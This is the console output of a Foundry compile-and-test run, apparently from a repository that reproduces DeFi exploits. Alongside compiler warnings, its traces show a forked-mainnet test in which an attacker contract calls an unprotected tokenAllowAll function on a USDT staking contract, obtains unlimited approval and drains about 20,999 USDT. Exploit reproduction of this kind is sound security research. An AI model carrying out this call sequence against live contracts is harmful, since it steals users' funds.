Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.18s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-07/USDTStakingContract28_exp.sol:24:5:
   |
24 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-07/USDTStakingContract28_exp.sol:46:5:
   |
46 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2023-07/USDTStakingContract28_exp.sol:23:1:
   |
23 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2023-07/USDTStakingContract28_exp.sol:42:5:
   |
42 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-07/USDTStakingContract28_exp.sol:57:9:
   |
57 |         address(USDT).call(
   |         ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.06s (5.91ms CPU time)

Ran 1 test for src/test/2023-07/USDTStakingContract28_exp.sol:ContractTest
[PASS] testExploit() (gas: 470938)
Logs:
  [Begin] Attacker USDT balance before exploit: 0.000000
  [End] Attacker USDT balance after exploit: 20999.916289

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17696562 [1.769e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [475738] ContractTest::testExploit()
    ├─ [5031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT balance before exploit", val: 0, decimals: 6)
    ├─ [323935] → new Money@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 2: 0 → 0x000000000000000000000000800cfd4a2ba8ce93ea2cc814fce26c3635169017
    │   │   @ 3: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 1: 0 → 0x0000000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d
    │   │   @ 0: 0 → 0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7
    │   └─ ← [Return] 1175 bytes of code
    ├─ [75237] Money::attack()
    │   ├─ [30402] 0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017::tokenAllowAll(0xdAC17F958D2ee523a2206206994597C13D831ec7, Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   ├─ [3356] 0xdAC17F958D2ee523a2206206994597C13D831ec7::allowance(0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017, Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [1356] 0xdAC17F958D2ee523a2206206994597C13D831ec7::allowance(0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017, Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [22953] 0xdAC17F958D2ee523a2206206994597C13D831ec7::approve(Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: 0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017, spender: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xf7a71ec8ad781cbd3ea335966ac6131bbf743f05a9edb0da26ecd81847f3e1de: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Stop]
    │   ├─ [3031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017) [staticcall]
    │   │   └─ ← [Return] 20999916289 [2.099e10]
    │   ├─ [35630] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transferFrom(0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20999916289 [2.099e10])
    │   │   ├─ emit Transfer(from: 0x800cfD4A2ba8CE93eA2cc814Fce26c3635169017, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20999916289 [2.099e10])
    │   │   ├─  storage changes:
    │   │   │   @ 0x08833349f544385f3c1f39904417b4f5ab2de871ff8d7ff054572e4e8e446a9b: 0x00000000000000000000000000000000000000000000000000000004e3b14b01 → 0
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000000000000000004e3b14b01
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 0xf7a71ec8ad781cbd3ea335966ac6131bbf743f05a9edb0da26ecd81847f3e1de: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [1031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 20999916289 [2.099e10]
    ├─ [2484] 0xdAC17F958D2ee523a2206206994597C13D831ec7::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 20999916289 [2.099e10], decimals: 6)
    ├─  storage changes:
    │   @ 34: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000000000000000004e3b14b01
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.16s (5.06s CPU time)

Ran 2 test suites in 8.04s (8.22s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
